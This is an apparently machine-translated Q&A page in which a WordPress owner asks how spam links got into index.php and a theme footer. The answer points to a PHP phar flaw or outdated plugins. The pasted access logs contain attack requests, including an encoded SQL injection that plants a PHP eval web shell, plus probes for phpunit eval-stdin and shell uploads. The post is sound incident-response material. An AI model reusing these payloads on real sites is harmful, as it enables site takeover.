Hacked Wordpress /index.php e /wp-content/themes/Avada/footer.php

2

Mi sono svegliato oggi per vedere le pagine in alto e in basso del mio sito web che mostravano un link con il testo "Cheap Jerseys Free Shipping".

Sono entrato rapidamente e ho visto che /index.php e /wp-content/themes/Avada/footer.php sono stati modificati, ho rimosso i collegamenti e salvato.

Voglio sapere in che modo la persona ha avuto accesso a entrambi i file in modo da poterla risolvere. Ho cercato ovunque, qualcuno può farmi sapere dove altro da guardare?

Ecco come appariva il mio index.php prima che lo risolvessi:

<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Mi sono assicurato il mio sito Wordpress seguendo la guida di hardening di Wordpress. Il sito è ospitato su Amazon Lightsail.

  1. Due utenti hanno accesso tramite SSH me con sudo e Vaultpress accesso limitato alla directory / web. L'accesso SSH è collegato all'e-mail istantanea notifica, non appena qualcuno accede tramite SSH e la posta elettronica viene inviata con IP, i registri di accesso mostrano che non è stato concesso alcun accesso ssh.
  2. Due utenti FTP con accesso limitato in sola lettura a / web / download / e / web / solo directory di aggiornamento
  3. Solo 1 utente su Wordpress, password ora cambiata. / wp-admin ha l'autorizzazione Consenti, nega Consenti da tutti Soddisfa qualsiasi e autenticazione della password in cui il file della password è in a .directory; AuthType Basic AuthName "Solo amministratori" AuthUserFile "/var/www/.xxx/xxxx/xxxxxx-xx-xxx" richiede utente valido wp-config.php in / directory ha ordine consentire, negare il rifiuto di tutti
  4. Tutti gli accessi tramite firewall bloccati tranne ssh, 22, 80 e 443 L'accesso al database è limitato a solo local.
  5. Google Tag Manager non è stato modificato e include solo link ad Analytics, Adwords e analisi dei clic specifici.

I log di accesso (accesso Web di Apache) che sembravano sospetti sono in basso, non so cosa significano. I backup dei backup di Vault mostrano che il cambiamento è avvenuto tra il 28 agosto (2:38 AM) e il 29 agosto (2:38 AM)

27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621

128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - [email protected] [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - [email protected] [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - [email protected] [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953

Le mie informazioni sul sito wordpress

Avada Versions: 

### Avada Versions ###

Current Version: 5.6.2
Previous Version: 5.5.2  5.6.0  5.6.1

### WordPress Environment ###

Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US

### Server Environment ###

Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000

MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1

## Active Plugins (11) ###

VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms
    
posta Waqas Tariq 29.08.2018 - 21:39
fonte

1 risposta

1

Il tuo sito è stato probabilmente attaccato usando l'ultimo Vulnerabilità PHP su Operazione di file indotta da unserialization tramite phar: // Stream Wrapper . In breve, è possibile caricare sul server un archivio Phar valido e attivare un'operazione di file su quel file.

Se questa non era la strada usata, controlla se qualcuno dei tuoi plug-in è obsoleto, sono i principali sospettati su ogni compromesso Wordpress. Puoi installare WP Scan sul tuo computer ed eseguirlo sul tuo blog. Se nessun plugin non viene aggiornato, WP Scan ti mostrerà.

    
risposta data 29.08.2018 - 22:04
fonte

Leggi altre domande sui tag